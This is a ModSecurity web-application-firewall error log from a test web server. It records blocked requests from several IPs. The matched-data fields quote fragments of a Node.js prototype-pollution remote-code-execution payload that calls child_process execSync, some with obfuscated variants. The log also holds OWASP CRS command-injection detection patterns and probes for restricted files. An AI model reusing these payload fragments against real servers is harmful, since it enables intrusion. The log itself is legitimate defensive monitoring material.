"attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.260706 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.427891 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Rule 7f2f272df320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.428136 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Rule 7f2f272d2030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.440362 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.440609 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=20,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 07:55:56.020514 2025] [:error] [pid 898838] [client 62.171.142.61:44088] [client 62.171.142.61] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfPr4G77J7RRdTh3xugAAAAA"]
[Mon Dec 22 07:55:56.020716 2025] [:error] [pid 898838] [client 62.171.142.61:44088] [client 62.171.142.61] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfPr4G77J7RRdTh3xugAAAAA"]
[Mon Dec 22 07:55:56.020825 2025] [:error] [pid 898838] [client 62.171.142.61:44088] [client 62.171.142.61] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfPr4G77J7RRdTh3xugAAAAA"]
[Mon Dec 22 07:55:56.022869 2025] [:error] [pid 898838] [client 62.171.142.61:44088] [client 62.171.142.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfPr4G77J7RRdTh3xugAAAAA"]
[Mon Dec 22 07:55:56.023076 2025] [:error] [pid 898838] [client 62.171.142.61:44088] [client 62.171.142.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfPr4G77J7RRdTh3xugAAAAA"]
[Mon Dec 22 07:55:56.287144 2025] [:error] [pid 902719] [client 62.171.142.61:44092] [client 62.171.142.61] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfB6WGa2ZloL8vwm80AAAAAo"]
[Mon Dec 22 07:55:56.287270 2025] [:error] [pid 902719] [client 62.171.142.61:44092] [client 62.171.142.61] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfB6WGa2ZloL8vwm80AAAAAo"]
[Mon Dec 22 07:55:56.287342 2025] [:error] [pid 902719] [client 62.171.142.61:44092] [client 62.171.142.61] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfB6WGa2ZloL8vwm80AAAAAo"]
[Mon Dec 22 07:55:56.288556 2025] [:error] [pid 902719] [client 62.171.142.61:44092] [client 62.171.142.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfB6WGa2ZloL8vwm80AAAAAo"]
[Mon Dec 22 07:55:56.288730 2025] [:error] [pid 902719] [client 62.171.142.61:44092] [client 62.171.142.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjrfB6WGa2ZloL8vwm80AAAAAo"]
[Mon Dec 22 18:02:22.574299 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.574828 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.575355 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Rule 7f2f269b8e58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.577752 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e28726571756972652c2070726f6365737329207b20202072657475726e206576616c285c75303036375c75303036635c75303036665c75303036325c75303036315c75303036635b537472696e672e66726f6d43686172436f64652836362c3131372c3130322c3130322c3130312c313134295d2e66726f6..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.577982 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.578232 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.736797 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Rule 7f2f272df320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.737027 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Rule 7f2f272d2030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.748595 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Mon Dec 22 18:02:22.748814 2025] [:error] [pid 912062] [client 164.90.183.185:60446] [client 164.90.183.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=20,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUl5nqGUmwZ8CG73PeFjIAAAAAE"]
[Tue Dec 23 19:24:58.672893 2025] [:error] [pid 922053] [client 176.29.149.35:23083] [client 176.29.149.35] ModSecurity: Warning. Pattern match "\\\\b(?:keep-alive|close),\\\\s?(?:keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "311"] [id "920210"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUreetrFNKKYU-HtVaVw6gAAAAY"]
[Tue Dec 23 21:53:18.044448 2025] [authz_core:error] [pid 920445] [client 62.60.131.218:55270] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Tue Dec 23 21:53:18.060841 2025] [authz_core:error] [pid 920449] [client 62.60.131.218:57392] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Dec 23 21:53:18.067167 2025] [:error] [pid 932700] [client 62.60.131.218:58888] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUsBPom6XiQBwYFycp47UAAAAAk"]
